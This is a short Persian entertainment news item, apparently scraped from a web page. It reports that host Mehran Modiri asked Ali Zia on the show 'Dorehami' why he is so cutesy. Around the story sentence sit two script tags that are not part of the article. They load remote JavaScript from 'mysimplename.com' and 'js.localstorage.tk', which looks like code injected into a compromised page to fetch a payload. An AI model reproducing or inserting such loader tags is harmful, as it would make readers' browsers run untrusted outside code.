سوال مهران مدیری از علی ضیا: چرا انقدر لوسی!؟


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>مهران مدیری در برنامه شب گذشته «دورهمی» از علی ضیا پرسید چرا انقدر لوسی!؟<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
5

- 
1

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر
نظرات
(برای مشاهده نظرات کلیک کنید)